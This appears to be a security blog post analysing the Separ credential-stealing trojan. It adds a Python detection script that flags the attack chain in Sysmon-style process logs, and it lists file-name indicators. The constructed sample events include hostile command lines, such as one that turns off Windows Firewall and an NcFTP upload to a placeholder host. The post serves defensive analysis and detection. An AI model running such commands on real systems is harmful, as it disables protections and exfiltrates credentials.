This trojan was first observed in late 2017 but has recently been updated. Separ is an information-stealing trojan that uses several legitimate applications to obtain user and system data.
Separ is distributed via spam campaigns as a self-extracting EXE file disguised as a PDF document. The emails allude to pricing quotes, shipments and equipment specs in order to trick business recipients into opening these attachments.
When opened, a VBScript file runs a batch script. This first batch script creates multiple new directories and copies several files into them before executing a second batch script.
This second batch script will then open an empty JPG file to hide command windows before altering Windows Firewall settings. It will then use the legitimate Email and Browser Password Dump tools created by SecurityXploded to extract mail and browser account credentials. Network information is also collected using the ipconfig utility. This information is then uploaded over FTP to a well-known file hosting platform using a version of the commercial NcFTP client.
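The execution chain described above (script host spawning a batch file, a firewall change from that batch, the renamed credential-dump tools, ipconfig, then an NcFTP upload) is what a detection engineer would hunt for in process-creation telemetry. The following is an added example, not code from the original post: it runs simple stage rules over constructed Sysmon-style process-creation records and flags a host only when several stages of the chain appear together. The file names come from the Indicators of Compromise listed below; the Sysmon field names are real, but the `host` field, the exact `netsh` command line, the `ncftpput.exe` binary name and the sample paths are assumptions made for the example.

```python
from collections import defaultdict

# Constructed Sysmon Event ID 1 style records (ParentImage, Image, CommandLine are real
# Sysmon fields; "host" is added for grouping). These are made-up samples for the example,
# not a capture of real Separ activity; the netsh command line and ncftpput name are assumed.
SAMPLE_EVENTS = [
    {"host": "WS01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\bob\AppData\Local\Temp\adobel.vbs"'},
    {"host": "WS01", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\bob\AppData\Local\Temp\adob01.bat"'},
    {"host": "WS01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\bob\AppData\Local\Temp\adob02.bat"'},
    {"host": "WS01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": r"netsh advfirewall set allprofiles state off"},  # assumed firewall change
    {"host": "WS01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\bob\AppData\Local\Temp\adobepdf.exe",
     "CommandLine": r"adobepdf.exe"},
    {"host": "WS01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\ipconfig.exe",
     "CommandLine": r"ipconfig /all"},
    {"host": "WS01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\bob\AppData\Local\Temp\ncftpput.exe",
     "CommandLine": r"ncftpput.exe -u user -p pass ftp.example.invalid /up out.txt"},
    # Benign activity on another host: an admin running ipconfig from an interactive shell.
    {"host": "WS02", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"cmd.exe"},
    {"host": "WS02", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\ipconfig.exe", "CommandLine": r"ipconfig /all"},
]

# File names taken from the post's Indicators of Compromise list.
IOC_NAMES = {"adobel.vbs", "adob01.bat", "adob02.bat", "adobepdf.exe", "adobepdf2.exe"}


def _basename(path):
    """Lower-cased final component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


# One rule per stage of the chain described in the post. Each rule looks at a single
# process-creation record; the chain is reconstructed by grouping hits per host.
STAGES = {
    # VBScript host (wscript/cscript) launching cmd.exe to run a .bat file
    "script_host_spawns_batch": lambda e: _basename(e["ParentImage"]) in ("wscript.exe", "cscript.exe")
        and _basename(e["Image"]) == "cmd.exe" and ".bat" in e["CommandLine"].lower(),
    # Windows Firewall settings changed via netsh from a batch script
    "firewall_modified_from_batch": lambda e: _basename(e["ParentImage"]) == "cmd.exe"
        and _basename(e["Image"]) == "netsh.exe" and "firewall" in e["CommandLine"].lower(),
    # Network information collected with ipconfig from a batch script
    "network_recon": lambda e: _basename(e["ParentImage"]) == "cmd.exe"
        and _basename(e["Image"]) == "ipconfig.exe",
    # NcFTP command-line client used for the upload (binary name is an assumption)
    "ftp_upload_client": lambda e: _basename(e["Image"]).startswith("ncftp"),
    # Any of the known file names (VBScript, batch files, renamed password-dump tools)
    "known_ioc_filename": lambda e: any(n in e["CommandLine"].lower() for n in IOC_NAMES)
        or _basename(e["Image"]) in IOC_NAMES,
}


def analyse(events):
    """Return {host: sorted list of stage names observed on that host}."""
    per_host = defaultdict(set)
    for e in events:
        for name, rule in STAGES.items():
            if rule(e):
                per_host[e["host"]].add(name)
    return {h: sorted(s) for h, s in per_host.items()}


def suspicious_hosts(events, min_stages=3):
    """Hosts where at least min_stages distinct stages of the chain were seen.

    Requiring several stages keeps single benign events (an admin running
    ipconfig, a legitimate netsh change) from paging anyone on their own.
    """
    return sorted(h for h, stages in analyse(events).items() if len(stages) >= min_stages)


if __name__ == "__main__":
    for host, stages in analyse(SAMPLE_EVENTS).items():
        print(host, stages)
    print("suspicious:", suspicious_hosts(SAMPLE_EVENTS))
```

The stage rules are deliberately behavioural (script host to cmd.exe to netsh/ipconfig/FTP client) rather than purely name-based, so a renamed dropper still trips the first four; the file-name rule is there to make the triage note point straight at the published indicators when they are present.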
Indicators of Compromise
- adobel.vbs – Initial VBScript file
- adob01.bat – First batch file
- adob02.bat – Second batch file
- adobepdf.exe – Browser password extract
- adobepdf2.exe – Email password extract
SHA256 File Hashes
Duncan is a technology professional with over 20 years' experience of working in various IT roles. He has an interest in cyber security, and has a wide range of other skills in radio, electronics and telecommunications.